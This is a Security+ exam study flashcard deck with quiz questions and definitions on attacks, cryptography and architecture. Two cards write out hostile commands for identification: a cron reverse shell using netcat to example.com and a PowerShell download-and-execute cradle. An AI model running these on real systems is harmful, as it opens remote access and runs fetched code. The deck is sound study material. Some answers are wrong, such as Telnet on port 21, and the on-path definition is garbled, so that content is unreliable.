Chap 1 and Chap 2 Flashcards
Threats, Attacks and Vulnerabilities Architecture and Design (209 cards)
1
Q
Chap1-8: Susan is analyzing the source code for an application and discovers a pointer de-reference and returns NULL. This causes the program to attempt to read from the NULL pointer and results in a segmentation fault. What impact could this have for the application?
A- A data breach
B- A denial-of-service condition
C- Permissions creep
D- Privilege escalation
A
B- A denial-of-service condition
2
Q
Chap1-10: Rick wants to make offline brute force attacks against his password file very difficult for attackers. Which of the following is not a common technique to make passwords harder to crack?
A- Use of a Salt
B- Use of a Pepper
C- Use of a purpose built password hashing algorithm
D- Encrypting password plain text using symmetric encryption
A
D- Encrypting password plain text using symmetric encryption
3
Q
Chap1-13: Chris needs visibility into connection attempts through a firewall because he believes that a TCP handshake is not properly occurring. What security information and event management (SIEM) capability is best suited to troubleshooting this issue?
A- Reviewing reports
B- Packet Capture
C- Sentiment Analysis
D- Log collection and Analysis
A
B- Packet Capture
4
Q
Chap 1-20: You have been asked to test your company network for security issues. The specific test you are conducting involves primarily using automated and semiautomated tools to look for known vulnerabilities with the various systems on your network. Which of the following best describes this test?
A- Vulnerability scan
B- Penetration test
C- Security audit
D- Security test
A
A- Vulnerability scan
5
Q
Chap 1-24: The organization that Mike works in find that one of their domains is directing traffic to a competitor’s website. When Mike checks, the domain information has been changed, including the contact and other administrative details for the domain. If the domain had not expired, what has most likely occured?
A- DNS hijacking
B- An on-path attack
C- Domain hijacking
D- A zero-day attack
A
C- Domain hijacking
6
Q
Chap 1-30: Alice wants to prevent SSRF attacks. Which of the following will not be helpful for preventing them?
A- Removing all SQL code from submitted HTTP queries
B- Blocking hostnames like 127.0.0.1 and localhost
C- Blocking sensitive URLs like /admin
D- Applying whitelist-based input filters
A
A- Removing all SQL code from submitted HTTP queries
7
Q
Chap 1-34: While investigating a malware outbreak on your company network, you discovery something very odd. There is a file that has the same name as a Windows system DLL, and it even has the same API interface, but it handles input very differently, in a manner to help compromise the system, and it appears that applications have been attaching to this file, rather than the real system DLL. What best describes this?
A- Shimming
B- Trojan Horse
C- Backdoor
D- Refactoring
A
A- Shimming
Shimming is a form of attack that targets a system’s security measures, making it an increasingly sophisticated cyber security threat. It works by creating a shim to buffer between a legacy program and the operating system, allowing attackers to intercept an API and change the arguments passed, redirect the operation or handle the data in some other way. This technique was first used with EMV chip cards as ATM skimming is not effective on these cards. In 2015, police departments worldwide started finding ATMs compromised with advanced new “shimming” devices made to steal data from chip cards. To protect against shimming attacks, organizations should be aware of uncommon techniques that can be leveraged to maintain persistence and used from within user space.
8
Q
Chap 1-38: Why is SSL stripping a particular danger with open WiFi networks?
A- WPA2 is not secure enough to prevent this.
B- Open hotspots do not assert their identity in a secure way.
C- Open hotspots can be accessed by any user
D- 802.11ac is insecure and traffic can be redirected
A
B- Open hotspots do not assert their identity in a secure way.
9
Q
Chap 1-45: Dennis uses an on-path attack to cause a system to send HTTPS traffic to his system and then forwards it to the actual server the traffic is intended for. What type of password attack can he conduct with the data he gathers if he captures all traffic from a login form?
A- A plain text password attack
B- A pass-the-hash attack
C- A SQL injection attack
D- A cross site scripting attack
A
A- A plain text password attack
10
Q
Chap 1-50: Your Wireless network has been breached. It appears the attacker modified a portion of data used with the stream cipher and used this to expose wirelessly encrypted data. What is this attack called?
A- Evil twin
B- Rogue WAP
C- IV Attack
D- WPS Attack
A
C- IV Attack
An initialization vector (IV) attack is an attack on wireless networks. It modifies the IV of an encrypted wireless packet during transmission. Once an attacker learns the plaintext of one packet, the attacker can compute the RC4 key stream generated by the IV used.
11
Q
Chap 1-57: John has discovered that an attacker is trying to get network passwords by using softrware that attempts a number of passwords from a list of common passwords. What type of attack is this?
Dictionary
Rainbow Table
Brute Force
Session Hijacking
A
Dictionary
12
Q
Chap 1-65 Matt discovers that a system on his network is sending hundreds of Ethernet frames to the switch it is connected to, with each frame containing a different source MAC address. What type of attack has he discovered?
Etherspam
MAC flooding
Hardware spoofing
MAC Hashing
A
MAC Flooding
13
Q
Chap 1-71: Amanda scans a Red Hat Linux server that she believes is fully patched and discovers that the Apache version on the server is reported as vulnerable to an exploit from a few months ago. When she checks to see if she is missing patches, Apache is fully patched. What has occurred?
A false positive
An automatic update failure
A false negative
An Apache version mismatch
A
A false positive
This is an example of a false positive. A false positive can cause a vulnerability to show that was not actually there. This happens sometimes when a patch or fix is installed but the application does not change in a way that shows the change, and it has been an issue with updates where the version number is the primary check for the vulnerability. When a vulnerability scanner sees a vulnerable version number but a patch has been installed that does not update it, a false positive report can occur. A false negative would report a patch or fix where there was actually a vulnerability. Automatic updates were not mentioned, nor was a specific Apache version
14
Q
Chap 1-79: Your company has hired an outside security firm to perform various tests of your network. During the vulnerability scan, you will provide the company with logins for various systems (i.e.: database server, application server, web server, etc..) to aid in their scan. What best describes this?
A known environment Test
A gray-box test
A credentialed scan
An intrusive scan
A
A credentialed scan
15
Q
Chap 1-85: Elizabeth is Investigation a network breach at her company. She discovers that a program was able to execute code within the address space of another process by using the target process to load a specific library. What best describes this attack?
Logic Bomb
Session Hijacking
Buffer Overflow
DLL Injection
A
DLL Injection
In a DLL Injection, the malware attempts to inject code into the process of some library. This is a rather advanced attack. Session Hijacking is incorrect because this is done by taking over an authenticated session
16
Q
Chap 1-87: What is the primary difference between an intrusive and non-intrusive vulnerability scan?
An intrusive scan is a penetration test
A non- intrusive scan is just a document check
An intrusive scan could potentially disrupt operations
A non-intrusive scan won’t find most vulnerabilities
A
An intrusive scan could potentially disrupt operations
17
Q
Chap 1-90: What two techniques are most commonly associated with a pharming attack?
Modifying the hosts file on a PC or exploiting a DNS vulnerability on a trusted DNS server
Phishing many users and harvesting email addresses from them
Phishing many users and harvesting passwords from them
Spoofing DNS server IP addresses or modifying the hosts file on a PC
A
Modifying the hosts file on a PC or exploiting a DNS vulnerability on a trusted DNS server
Pharming attempts to redirect traffic intended for a legitimate site to another malicious site. Attackers most often do this by changing the local hosts file or by exploiting a trusted DNS server
18
Q
Chap 1-96 What type of attack involves adding an expression or phrase such as adding “SAFE” to mail headers?
Pretexting
Phishing
SQL Injection
Prepending
A
Prepending
19
Q
Prepending
A
Not Commonly used: specific to CompTIA; Can mean one of 3 things:
1- Adding an expression or phrase to an email subject line or headers to protect or fool users
2- Adding data as part of an attack
3- Social Engineers may prepend information by inserting it into a conversation to get targets to think about things the attacker wants them to
20
Q
Chap 1-97: Charles wants to ensure that his outsourced code development efforts are as secure as possible. Which of the following is not a common practice to ensure secure remote code development?
Ensure developers are trained on secure coding techniques
Set defined acceptance criteria for code security
Test code using automated and manual security testing systems
Audit all underlying libraries used in the code
A
Audit all underlying libraries used in the code
21
Q
Chap 1-104: Valerie is responsible for security testing applications in her company. She has discovered that a web application, under certain conditions, can generate a memory leak. What type of attack would this leave the application vulnerable to?
DoS
Backdoor
SQL Injection
Buffer Overflow
A
DoS
22
Q
Chap 1-105: The mobile game that Jack has spent the last year developing has been released, and malicious actors are sending traffic to the server that runs it to prevent it from competing with other games in the App Store. What type of denial-of-service attack is this?
Network DoS
Operational Technology DDoS
GDos
Application DDos
A
Application DDoS
This is an example of an application DDoS aimed at a gaming application. A network DDoS would be aimed at network technology, either the devices or protocols that underly networks. An operational technology (OT) DDoS targets SCADA, ICS, utility or similar operational systems. GDoS does not exist
23
Q
Pepper
A
In cryptography, a pepper is a secret added to an input such as a password during hashing with a cryptographic hash function. This value differs from a salt in that it is not stored alongside a password hash, but rather the pepper is kept separate in some other medium, such as a Hardware Security Module.[1] Note that the National Institute of Standards and Technology never refers to this value as a pepper but rather as a secret salt. A pepper is similar in concept to a salt or an encryption key. It is like a salt in that it is a randomized value that is added to a password hash, and it is similar to an encryption key in that it should be kept secret. A pepper performs a comparable role to a salt or an encryption key, but while a salt is not secret (merely unique) and can be stored alongside the hashed output, a pepper is secret and must not be stored with the output. The hash and salt are usually stored in a database, but a pepper must be stored separately to prevent it from being obtained by the attacker in case of a database breach.[2] Where the salt only has to be long enough to be unique per user[dubious – discuss], a pepper should be long enough to remain secret from brute force attempts to discover it (NIST recommends at least 112 bits).
24
Q
Segmentation Fault
A
In computing, a segmentation fault (often shortened to segfault) or access violation is a fault, or failure condition, raised by hardware with memory protection, notifying an operating system (OS) the software has attempted to access a restricted area of memory (a memory access violation). On standard x86 computers, this is a form of general protection fault. The operating system kernel will, in response, usually perform some corrective action, generally passing the fault on to the offending process by sending the process a signal. Processes can in some cases install a custom signal handler, allowing them to recover on their own,[1] but otherwise the OS default signal handler is used, generally causing abnormal termination of the process (a program crash), and sometimes a core dum
25
Passive Reconnaissance
Any reconnaissance that is done without actually connecting to the target. In the example OSINT or Open Source Intelligence is conducted as user used commonly available third-party information sources in order to collect information about target`
26
Active Reconnaissance
Involves communicating with the target network, e.g.: port scan
27
SSRF / XSRF
Server-Side (Cross-site) request forgery: https://www.imperva.com/learn/application-security/server-side-request-forgery-ssrf/#ImpervaResources . A Server-Side Request Forgery (SSRF) attack involves an attacker abusing server functionality to access or modify resources. The attacker targets an application that supports data imports from URLs or allows them to read data from URLs. URLs can be manipulated, either by replacing them with new ones or by tampering with URL path traversal.
28
Shimming
Shimming is a form of attack that targets a system’s security measures, making it an increasingly sophisticated cyber security threat. It works by creating a shim to buffer between a legacy program and the operating system, allowing attackers to intercept an API and change the arguments passed, redirect the operation or handle the data in some other way. This technique was first used with EMV chip cards as ATM skimming is not effective on these cards. In 2015, police departments worldwide started finding ATMs compromised with advanced new “shimming” devices made to steal data from chip cards. To protect against shimming attacks, organizations should be aware of uncommon techniques that can be leveraged to maintain persistence and used from within user space.
29
IV Attack
An initialization vector (IV) attack is an attack on wireless networks. It modifies the IV of an encrypted wireless packet during transmission. Once an attacker learns the plaintext of one packet, the attacker can compute the RC4 key stream generated by the IV used.
30
DLL Injection
DLL injection is a technique used for running code within the address space of another process by forcing it to load a dynamic-link library.[1] DLL injection is often used by external programs to influence the behavior of another program in a way its authors did not anticipate or intend.[1][2][3] For example, the injected code could hook system function calls,[4][5] or read the contents of password textboxes, which cannot be done the usual way.[6] A program used to inject arbitrary code into arbitrary processes is called a DLL injector.
31
OpenVAS
open source vulnerability scanner
32
Birthday Attack
A birthday attack is a type of cryptographic attack that exploits the mathematics behind the birthday problem in probability theory. This attack can be used to abuse communication between two or more parties. The attack depends on the higher likelihood of collisions found between random attack attempts and a fixed degree of permutations (pigeonholes). With a birthday attack, it is possible to find a collision of a hash function in being the classical preimage resistance security. There is a general (though disputed[1]) result that quantum computers can perform birthday attacks, thus breaking collision resistance
33
Chap 1-108: When a multithreaded application does not properly handle various threads accessing a common value, and one thread can change the data while another thread is relaying on it, what flaw is this?
Memory Leak
Buffer Overflow
Integer Overflow
Time of Check/Time of Use
Time of Check/Time of Use
In software development, time-of-check to time-of-use (TOCTOU, TOCTTOU or TOC/TOU) is a class of software bugs caused by a race condition involving the checking of the state of a part of a system (such as a security credential) and the use of the results of that check.
If access is not handled properly, a time of check/time of use condition can exist where the memory is checked, changed then used.
34
Chap 1-112: Adam wants to download lists of malicious or untrustworthy IP addresses and domains using STIX and TAXII. What type of service is he looking for?
A vulnerability feed
A threat feed
A hunting feed
A rule feed
Threat Feed
35
TAXII
TAXII, short for Trusted Automated eXchange of Intelligence Information, defines how cyber threat information can be shared via services and message exchanges. It is designed specifically to support STIX information, which it does by defining an API that aligns with common sharing models. The three principal models for TAXII include:
Hub and spoke – one repository of information
Source/subscriber – one single source of information
Peer-to-peer – multiple groups share information
TAXII defines four services. Users can select and implement as many as they require, and combine them for different sharing models.
Discovery – a way to learn what services an entity supports and how to interact with them
Collection Management – a way to learn about and request subscriptions to data collections
Inbox – a way to receive content (push messaging)
Poll – a way to request content (pull messaging)
36
STIX
STIX, short for Structured Threat Information eXpression, is a standardized language developed by MITRE and the OASIS Cyber Threat Intelligence (CTI) Technical Committee for describing cyber threat information. It has been adopted as an international standard by various intelligence sharing communities and organizations. It is designed to be shared via TAXII but can be shared by other means. STIX is structured so that users can describe threat:
Motivations
Abilities
Capabilities
Response
37
Chap 1-123: John has been asked to do a penetration test of a company. He has been given general information but no details about the network. What kind of test is this?
Partially Known Environment
Known Environment
Unknown Environment
Masked
Partially Known Environment
38
Chap 1-124:Under which type of attack does an attacker's system appear to be the server to the real client and the client to the real server?
Denial-of-service
Replay
Eavesdropping
On-Path
On-Path
39
On-Path Attack
An on-path assault is an aggressor that sits in the center between two stations and can catch, and sometimes, change that data that is being sent intelligently across the organization. This is a kind of assault that can happen secretly that anybody is sitting in the discussion. Indeed, you may hear this alluded to frequently as a man-in-the-center assault. The way in to the on-way assault is that the first information stream will be blocked by the individual in the discussion, and that data will then, at that point be given to the objective. This permits the assailant who's sitting in the center to peruse everything going to and fro between these two gadgets, and it might likewise permit the aggressor to adjust the data as it's being sent.
40
Chap 1-125 You are a security administrator for Acme Corporation. You have discovered malware on some of your company's machines. This malware seems to intercept calls from the web browser to libraries, and then manipulates the browser calls. What type of attack is this?
Man in the Browser
On-Path Attack
Buffer Overflow
Session Hijacking
Man in the Browser
41
Chap 1-127: You are responsible for software testing at Acme Corporation. You want to check all software for bugs that might be used by an attacker to gain entrance into the software on your network. You have discovered a web application that would allow a user to attempt to put a 64-bit value into a 4-byte integer variable. What is this type of flaw?
Memory overflow
Buffer overflow
Variable overflow
Integer overflow
Integer overflow
Memory overflow is incorrect, its Memory Leak
Variable overflow isn't a thing
Buffer overflow deals with arrays
42
Cross-Site Scripting (XSS)
XSS Attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
43
What is IRC's default port?
TCP port -6667
44
Smishing
Phishing via SMS (text message)
45
Chap 1-146: Tracy is concerned about LDAP injection attacks against her directory server. Which of the following is not a common technique to prevent LDAP injection techniques?
Secure configuration of LDAP
User Input validation
LDAP query parameterization
Output filtering rules
LDAP query parameterization
46
Chap 1-149: What is the most significant difference between cloud service-based and on-premises vulnerabilities?
Your ability to remediate it yourself
The severity of the vulnerability
The time required to remediate
Your responsibility for compromised data
Your ability to remediate it yourself
Vulnerabilities in cloud services require work on the part of the cloud service provider to remediate them. You can remediate most vulnerabilities in your own infrastructure yourself without a third party.
47
Chap 1-162: A penetration tester called a help desk staff member at the company that Charles works at and claimed to be a senior executive who needed her password changed immediately due to an important meeting they needed to conduct that would happen in a few minutes. The staff member changed the executive's password to a password that the penetration tester provided. What social engineering principal did the penetration tester leverage to accomplish this attack?
Intimidation
Scarcity
Urgency
Trust
Urgency
48
Chap 1-161 Amanda encounters a Bash script that runs the following command:
crontab -e 0 * * * * nc example.com 8989 -e /bin/bash
What does this command do?
It checks the time every hour
It pulls data from example.com every minute
It sets up a reverse shell
none of the above
The command starts a reverse shell connecting to example.com on port 8989 every hour.
49
Chap 1-159: You have noticed that when in a crowded area, data from your cell phone is stolen. Later investigation shows a Bluetooth connection to your phone, one that you cannot explain. What describes this attack?
Bluejacking
Bluesnarfing
Evil Twin
RAT
Bluesnarfing
50
Bluesnarfing
Bluesnarfing is a hacking technique in which a hacker accesses a wireless device through a Bluetooth connection. It happens without the device user's permission and often results in the theft of information or some other kind of damage to the device (and user).
51
Bluejacking
It's an attack that sends unsolicited messages to Bluetooth-enabled devices, provided the target is in a certain area.
52
Chap 1-157: What type of attack is the US Trusted Foundry program intended to help prevent?
Critical Infrastructure attacks
Metalwork and casting attacks
Supply chain attacks
Software source code attacks
The US Trusted Foundry program is intended to prevent supply chain attacks by ensuring end-to-end supply chain secureity for important integrated circuits and electronics
53
Chap 1-156: What type of attack is an SSL stripping attack?
A brute-force attack
A trojan attack
An on-path attack
A downgrade attack
An On-Path attack
54
SSL stripping
An SSL stripping attack requires the attackers to persuade a victim to send traffic through them via HTTP while continuing to send HTTPS encrypted traffic to the legitimate server by pretending to be the victim
55
Chap 1-155: What two files are commonly attacked using offline brute force attacks?
Windows registry and the Linux /etc/passwd file
Windows SAM and the Linux /etc/passwd file
Windows SAM and the Linux /etc/shadow file
Windows registry and the Linux /etc/shadow file
Windows SAM and Linux /etc/shadow file
56
Windows SAM
The Security Accounts Manager (SAM) is a database file in the Microsoft Windows operating system (OS) that contains usernames and passwords.
57
Linux /etc/shadow
A shadow password file, also known as /etc/shadow, is a system file in Linux that stores encrypted user passwords and is accessible only to the root user, preventing unauthorized users or malicious actors from breaking into the system.
58
Linux /etc/passwd
Traditionally, the /etc/passwd file is used to keep track of every registered user that has access to a system. It contains a list of the system’s accounts, giving for each account some useful information like user ID, group ID, home directory, shell, and more. The /etc/passwd file should have general read permission as many command utilities use it to map user IDs to user names. However, write access to the /etc/passwd must only limit for the superuser/root account.
59
Maneuver
CompTIA defines Maneuver in the context of threat hunting as how to think like a malicious user to help you identify potential indicators of compromise in your environment.
60
Pretexing
Pretexting is a type of social engineering that involves using a false motive and lying to obtain information
61
In the United States, collaborative industry organizations that analyze and share cybersecurity threat information within their industry verticals are know by what term?
IRTs
ISACs
Feedburners
Vertical threat feeds
ISACs
62
IRTs
Incident Response Team
63
ISACs
Information Sharing and Analysis Center: helps critical infrastructure owners and operators protect their facilities, personnel and customers from cyber and physical security threats and other hazards
64
Feedburner
Feedburner is Google's RSS feed management tool
65
Chap 1-178: During a penetration test, Kathleen gathers information, including the organization's domain name, IP Address, employee information, phone numbers, email addresses, and similar data. What is this process typically called?
Mapping
Footprinting
Fingerprinting
Aggregration
Footprinting
66
Footprinting
Process of gathering information about a computer system, or network, and it can involve both active and passive techniques
67
Refactoring
Refactoring a program by automated means can include adding additional text, comments, or nonfunctional operations to make the program have a different signature without changing its operations. This is typically not a manual process as anti-malware tools can quickly find new versions. Instead, refactoring is done via a polymorphic or code mutation technique that changes the malware every time it is installed to help avoid signature based systems.
68
Hybrid Warfare
Multipronged attacks conducted as part of a military or national strategy of political warfare that uses traditional, asymmetric and cyberwarefare techniques along with influence methods to achieve goals
69
Chap 1-185: Sarah is reviewing the logs for her web server and sees an entry flagged for review that includes the following HTTP request:
ChecinstockAPI=http://localhost/admin.php
What type of attack is being attempted?
Cross site scripting attack
Server-side request forgery
Client-side request forgery
SQL injection
Server-side request forgery
70
Angela reviews bulletins and advisories to determine what threats her organization is likely to face. What type of activity is this associated with?
Incident Response
Threat Hunting
Vulnerability Scanning
Penetration testing
Threat Hunting
71
Threat Hunting
proactively searching for cyber threats that are lurking undetected in a network.
72
Chap 1-195: If Frank were still operating his on-site infrastructure, which of the following technologies would provide the most insight into what type of attack he was seeing?
Firewall
IPS
Vulnerability Scanner
Antimalware Software
IPS
73
Chap 1-196: Aliana wants to ensure that the on-site system integration that a vendor that her company is working with is done in accordance with industry best practices. Which of the following is not a common method of ensuring this?
Inserting security requirements into contracts
Auditing configurations
Coordinating with the vendor for security reviews during and after installation
Requiring a SOC report
Requiring a SOC report
SOC reports are only needed when data is being stored/hosted
74
Chap 1-202: Direct access, wireless, email, supply chain, social media, removable media, and cloud are all examples of what?
Threat Intelligence Sources
Threat Vectors
Attributes of threat actors
Vulnerabilities
Threat Vectors
75
Chap 1-205: Claire discovers the following Powershell script. What does it do?
powershell.exe -ep Bypass -nop -noexit -c iex
((New ObjectNet.WebClient)). DownloadString('https://example.com/file.psl))
Downloads a file and opens a remote shell
Uploads a file and deletes the local copy
Downloads a file into memory
Uploads a file from memory
Downloads a file into memory
76
Charles finds a vulnerability in his PHP server via an OpenVAS scan. What should he do first to determine the best fix for the vulnerability?
Disable PHP-CGI
Upgrade to the latest version of PHP
Review the vulnerability descriptions in the CVEs listed.
Disable the server
Review the vulnerability descriptions in the CVEs listed.
77
What is the SSH port?
TCP 22
78
What is the Telnet port?
TCP 21
79
Chap 2-2: You are responsible for network security at an e-commerce company. You want to ensure that you are using the best practices for the e-commerce website your company hosts. What standard would be best for you to review?
OWASP
NERC
Trusted Foundry
ISA/IEC
OWASP
80
OWASP
Open Web Application Security Project: de facto standard for web application security+
81
Chap 2-3: Cheryl is responsible for cyber-security at a mid-sized insurance company. She has decided to use a different vendor for network antimalware than she uses for host antimalware. Is this a recommended action, and why or why not?
This is not recommended; you should use a single vendor for a particular security control
This is recommended; this is described as vendor diversity
This is not recommended; this is described as vendor forking
It is neutral; This does not improve or detract from security.
This is recommended; this is described as vendor diversity
82
Chap 2-8: Which of the following is not a critical characteristic of a hash function?
It converts variable length input into a fixed length output
Multiple inputs should not hash to the same output
It must be reversible
It should be fast to compute
It must be reversible
83
Chap 2-11: Trevor wants to use an inexpensive device to build a custom embedded system that can monitor a process. Which of the following options is best suited for this if he wants to mimize the expense and maximize simplicity while avoiding the potential for system or device compromise?
Raspberry Pi
custom FPGA
Repurposed desktop PC
Arduino
Arduino
its cheapest option and since its not a fully computer chance of compromise is much less
84
Chap 2-12: Amanda wants to use a digital signature on an email she is sending to Maria. Which key should she use to sign the email?
Maria's public key
Amanda's public key
Maria's private key
Amanda's private key
Amanda's private key
Digital signatures are created using the signer's private key, allowing it to be validated using their public key
85
Chap 2-14: Gurvinder knows that the OpenSSL passwd file protects passwords by using 1,000 rounds of MD5 hashing to help protect password information. What is this technique called?
Spinning the hash
Key rotation
Key stretching
Hash iteration
Key stretching
86
Key stretching
In cryptography, key stretching techniques are used to make a possibly weak key, typically a password or passphrase, more secure against a brute-force attack by increasing the resources (time and possibly space) it takes to test each possible key.
One way is to repeatedly use a hash function or block cipher, increasing the effort that an attacker would need to exert to attack the resulting hashed or encrypted data
87
KDF
In cryptography, a key derivation function (KDF) is a cryptographic algorithm that derives one or more secret keys from a secret value such as a master key, a password, or a passphrase using a pseudorandom function (which typically uses a cryptographic hash function or block cipher).
88
Chap 2-16: Ian wants to send an encrypted message to Michelle using public key cryptography. What key does he need to encrypt the message?
His public key
His private key
Her public key
Her private key
Her public key
Ian will use Michelle's public key to encrypt the message so that only she can read it using her private key. If he wanted to sign the message, he could use his private key and Michelle could use his public key to validate his signature. Neither Ian nor Michelle should ever reveal their private keys.
89
Chap 2-17: What key advantage does an elliptical curve cryptosystem have over an RSA-based cryptosystem?
It can use a smaller key length for the same resistance to being broken
It requires only a single key to encrypt and decrypt
It can run on older processors
It can be used for digital signatures as well as encryption
It can use a smaller key length for the same resistance to being broken
90
ECC
Elliptic Curve Cryptography (ECC) is a key-based technique for encrypting data. ECC focuses on pairs of public and private keys for decryption and encryption of web traffic.
It is faster because it can use a smaller key length to achieve levels of security similar to a longer RSA key; a 228-bit ECC key is approx equal to a 2380-bit RSA key
91
Perfect Forward Secrecy
Perfect Forward Secrecy (PFS), also called forward secrecy (FS), refers to an encryption system that changes the keys used to encrypt and decrypt information frequently and automatically. This ongoing process ensures that even if the most recent key is hacked, a minimal amount of sensitive data is exposed.
92
SCADA
SCADA is the acronym for Supervisory Control and Data Acquisition. SCADA is a computer-based system for gathering and analyzing real-time data to monitor and control equipment that deals with critical and time-sensitive materials or events. SCADA systems were first used in the 1960s and are now an integral component in virtually all industrial plant and production facilities. https://oleumtech.com/what-is-scada
93
What function does counter mode perform in a cryptographic system?
It reverses the encryption process
It turns a block cipher into a stream cipher
It turns a steam cipher into a block cipher
It allows public keys to unlock private keys
It turns a block cipher into a stream cipher
94
Block cipher
A block cipher is a method of encrypting data in blocks to produce ciphertext using a cryptographic key and algorithm. The block cipher processes fixed-size blocks simultaneously, as opposed to a stream cipher, which encrypts data one bit at a time.
95
Stream cipher
A stream cipher is an encryption technique that works byte by byte to transform plain text into code that's unreadable to anyone without the proper key. Stream ciphers are linear, so the same key both encrypts and decrypts messages. And while cracking them can be difficult, hackers have managed to do it.
96
Chap 2-27: Which of the following items is not included in a blockchain's public ledger
A record of all genuine transactions between network participants
A record of cryptocurrency balances (or other data) stored in the blockchain
The identity of the blockchain participants
A token that identifies the authority under which the transaction was made.
A token that identifies the authority under which the transaction was made.
97
Counter mode
Counter Mode, CTR, makes a block cipher into a stream cipher by generating a key stream block using a non-repeating sequence to fill the block. This allows the data to be streamed instead of waiting for the blocks to be ready to send.
98
Chap 2-29: Alexandria is preparing to run automated security tests against the code that developers in her organization have completed. Which environment is she most likely to run them in if the next step is to deploy code to production?
Development
Test
Staging
Production
Staging (sometimes called PreProduction)
99
Chap 2-31: Derek has been assigned to assess the security of smart meters. Which of the following is not a common concern for an embedded system like a smart meter?
Eavesdroping
Denial of Service
Remote Disconnection
SQL injection
SQL injection, because they typically don't include a SQL server
100
Chap 2-32: Selah wants to analyze real world attack patterns against systems similar to what she already has deployed in her organization. She would like to see local commands on a compromised system and have access to any tools or other materials the attackers would normally deploy. What type of technology could she use to do this?
A honeypot
An IPS
An IDS
A WAF
Honeypot
101
FDE
Full Disk Encryption
102
NIPS
Network Intrusion Prevention System: A network-based intrusion prevention system (NIPS) is a system used to monitor a network as well as protect the confidentiality, integrity, and availability of a network. Its main functions include protecting the network from threats, such as denial of service (DoS) and unauthorized usage.
103
Chap 2-34: Maria is a security engineer with a manufacturing company. During a recent investigation she discovered that an engineer's compromised workstation was being used to connect to SCADA systems while the engineer was not logged in. The engineer is responsible for administering the SCADA systems and cannot be blocked from connecting to them. What should Maria do to mitigate this threat?
Install host based antivirus software on the engineer's system
Implement account usage auditing on the SCADA system
Implement an NIPS on the SCADA
Use FDE on the engineer's system
Implement account usage auditing on the SCADA system
104
Chap 2-35: AES and DES are an example of what type of cipher?
Stream ciphers that encrypt groups of plain-text symbols all together.
Block ciphers that encrypt groups of plain-text symbols all together.
Stream ciphers that encrypt one plain-text symbol at a time.
Block ciphers that encrypt one plain-text symbol at a time.
Block ciphers that encrypt groups of plain-text symbols all together.
105
AES
The Advanced Encryption Standard (AES), also known by its original name Rijndael is a specification for the encryption of electronic data established by the U.S. National Institute of Standards and Technology (NIST) in 2001
AES is a variant of the Rijndael block cipher developed by two Belgian cryptographers, Joan Daemen and Vincent Rijmen. Rijndael is a family of ciphers with different key and block sizes.
Block size = 128 bits
Key lengths = 128, 192 and 256 bits.
106
DES
The Data Encryption Standard is a symmetric-key algorithm for the encryption of digital data. Although its short key length of 56 bits makes it too insecure for modern applications, it has been highly influential in the advancement of cryptography.
Block cipher
Key sizes = 56 bits
Block sizes = 64 bits
107
Chap 2-37: What purpose does a transit gateway serve in Cloud Services?
It connects systems inside of a cloud data center
It connects VPCs and on-premise data centers
It provides an API gateway between trust zones
It allows multicloud infrastructure designs
It connects VPCs and on-premise data centers
108
Transit Gateway Service
A transit hub used to connect a VPC (Virtual Private Cloud) to an on-premise data center
109
Chap 2-38: Web developers in your company currently have direct access to the production server and can deploy code directly to it. This can lead to unsecure code or simply code flaws being deployed to the live system. What would be the best change you could make to mitigate this risk?
Implement Sandboxing
Implement Virtualized Servers
Implement a Staging Server
Implement deployment policies
Implement a Staging Server
110
Chap 2-39: Ian is concerned about VoIP phones used in his organization due to the use of SMS as par of their multifactor authentication rollout. What type of attack should he be concerned about?
A vishing attack
A voicemail hijack
An SMS token redirect
A weak multifactor code injection
An SMS token redirect
111
Chap 2-45: Chris sets a resource policy in his cloud environment. What type of control does this allow him to exert?
It allows him to determine how much disk space can be used
It allows him to determine how much bandwidth can be used
It allows him to specify who has access to resources and what actions they can perform on it
It allows him to specify what actions a resource can take on specific users
It allows him to specify who has access to resources and what actions they can perform on it
112
Chap 2-46: Chris sets up SAN replication for his organization. What has he done?
He has enabled RAID 1 to ensure that the SAN cannot lose data if a drive fails because the drives are replicated
He has set up backups o a tape library for the SAN to ensure data resilience
He has built a second identical set of hardware for his SAN
He has replicated the data on one SAN to another at the block or hardware level
He has replicated the data on one SAN to another at the block or hardware level
113
RAID 5
Disk striping with distributed parity
114
RAID 0
Disk striping
115
RAID 1
Disk Mirroring
116
RAID 3
Disk striping with dedicated parity
117
EMI
electromagnetic interference
118
Normalization
process of removing duplication or redundant data from a database
119
RAID 1+0
aka RAID 10: mirrored data set (RAID 1) which is then striped (RAID 0)
120
RAID 6
disk striping with dual parity (distributed)
121
Chap 2-58 Where does TLS/SSL inspection happen, and how does it occur?
On the client using a proxy
On the server, using a protocol analyzer
At the certificate authority by validating a request for a TLS certificate
Between the client and the server by intercepting encrypted communications
Between the client and the server by intercepting encrypted communications
TLS interception devices act as an on-path attack and decrypt traffic to scan and analyze it, for malware of other signs of attacks, and then encrypt it to send to its destination. It has both legitimate and illegitimate uses
122
VM Sprawl
Virtualization sprawl is a phenomenon that occurs when the number of virtual machines (VMs) on a network reaches a point where administrators can no longer manage them effectively. Virtualization sprawl is also referred to as virtual machine sprawl, VM sprawl or virtual server sprawl.
123
VM escape
Situation where the attacker is able to go thru the VM and interact directly with the hypervisor, and potentially the host OS
124
DNS Sinkhole
A DNS Server used to spoof DNS servers that would normally resolve to an unwanted or malicious hostname
125
Chap 2-59: Diana wants to prevent drones from flying over her organization's property. What can she do?
Deploy an automated take down system that will shoot the drones down.
Deploy radio frequency jammers to disrupt the drone's control frequencies
Contact the FAA to get her company's property listed as a no-fly zone
None of the above
None of the above
None of them are practical. Shooting down is illegal destruction of property; Jamming is also illegal and could create an issue with the FTC; the FAA rarely does this
126
Chap 2-61: You are responsible for database security at your company. You are concerned that programmers might pass badly written SQL commands to the database., or that an attacker might exploit badly written SQL in applications. What is the best way to mitigate this threat?
Formal code inspection
Programming policies
Agile programming
Stored procedures
Stored procedures
127
Chap 2-62: Joanna's company has adopted multiple SaaS tools and now wants to better coordinate them so the data that they each contain can be used in multiple services. What type of solution should she recommend if she wants to minimize the complexity of long term maintenance for her organization?
Replace the SaaS service with a PaaS environment to move everything to a single platform
Build API based integrations using in-house expertise
Adopt an integration platform to leverage scalability
Build flat file integrations using in-house expertise
Adopt an integration platform to leverage scalability
128
Chap 2-70: Gerald is concerned about unauthorized people entering the company's building. Which of the following would be most effective in preventing this?
Alarm Systems
Fencing
Cameras
Security Guards
Security Guards
129
